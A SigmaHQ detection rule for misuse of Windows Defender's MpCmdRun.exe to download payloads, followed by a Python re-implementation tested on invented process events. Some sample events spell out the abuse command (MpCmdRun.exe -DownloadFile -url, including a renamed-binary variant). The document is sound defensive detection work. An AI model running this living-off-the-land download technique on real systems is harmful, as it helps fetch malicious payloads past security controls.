SigmaHQ/rules/windows/process_creation/win_susp_mpcmdrun_download.yml

title: Windows Defender Download Activity
id: 46123129-1024-423e-9fae-43af4a0fa9a5
status: experimental
description: Detect the use of Windows Defender to download payloads
author: Matthew Matchen
date: 2020/09/04
references:
    - https://twitter.com/djmtshepana/status/1301608169496612866
    - https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
tags:
    - attack.defense_evasion
    - attack.t1218.010
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        - CommandLine|contains: 'MpCmdRun.exe'
        - Description: 'Microsoft Malware Protection Command Line Utility'
    selection2:
        CommandLine|contains|all:
            - 'DownloadFile'
            - 'url'
    condition: selection1 and selection2
fields:
    - CommandLine
falsepositives:
    - Unknown
level: high
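The rule's logic, re-implemented in Python and run over constructed process-creation events, as an added example that is not part of the SigmaHQ repository or of any Sigma backend. It encodes the Sigma semantics the rule relies on: a list of maps under `selection1` is a logical OR, `contains` and `contains|all` are case-insensitive substring tests, a plain string value is a case-insensitive exact match, and `condition` ANDs the two selections. Field names (`CommandLine`, `Description`, `Image`) follow the Sigma `process_creation` taxonomy; the events, URLs and paths are invented for the demonstration.

```python
from typing import Any, Dict, List

# Constructed sample events (not real telemetry). The first two should fire,
# the last two should not.
SAMPLE_EVENTS: List[Dict[str, Any]] = [
    {   # binary named in the command line, both selection2 tokens present
        "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        "CommandLine": r"MpCmdRun.exe -DownloadFile -url https://example.invalid/a.bin",
        "Description": "Microsoft Malware Protection Command Line Utility",
    },
    {   # renamed copy: caught only via the Description field, tokens in odd case
        "Image": r"C:\Users\Public\updater.exe",
        "CommandLine": r"updater.exe -downloadfile -URL https://example.invalid/b.bin",
        "Description": "Microsoft Malware Protection Command Line Utility",
    },
    {   # routine signature update: no DownloadFile token, so selection2 fails
        "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        "CommandLine": r"MpCmdRun.exe -SignatureUpdate",
        "Description": "Microsoft Malware Protection Command Line Utility",
    },
    {   # both tokens appear, but neither selection1 item matches
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": r"curl.exe --url https://example.invalid/DownloadFile",
        "Description": "The curl executable",
    },
]


def _contains(value: Any, needle: str) -> bool:
    """Sigma 'contains' modifier: case-insensitive substring test; a missing field never matches."""
    return value is not None and needle.lower() in str(value).lower()


def _equals(value: Any, expected: str) -> bool:
    """Sigma plain string value: case-insensitive exact match."""
    return value is not None and str(value).lower() == expected.lower()


def selection1(event: Dict[str, Any]) -> bool:
    # A YAML list of maps is OR'ed: either the command line names the binary,
    # or the file description identifies it (covers renamed copies).
    return (
        _contains(event.get("CommandLine"), "MpCmdRun.exe")
        or _equals(event.get("Description"), "Microsoft Malware Protection Command Line Utility")
    )


def selection2(event: Dict[str, Any]) -> bool:
    # 'contains|all': every listed token must appear in the field.
    cmd = event.get("CommandLine")
    return all(_contains(cmd, token) for token in ("DownloadFile", "url"))


def rule_matches(event: Dict[str, Any]) -> bool:
    # condition: selection1 and selection2
    return selection1(event) and selection2(event)


def run_rule(events: List[Dict[str, Any]]) -> List[int]:
    """Return the indices of events the rule fires on."""
    return [i for i, event in enumerate(events) if rule_matches(event)]


if __name__ == "__main__":
    for idx in run_rule(SAMPLE_EVENTS):
        print(f"ALERT event[{idx}]: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The fourth event shows why `selection2` is not a rule on its own: `url` and `DownloadFile` are short tokens that can appear in unrelated command lines, and only the AND with `selection1` keeps the rule specific to MpCmdRun. The second event shows the value of the `Description` alternative: Sysmon and similar sources populate it from the binary's version resource, so a renamed copy still matches.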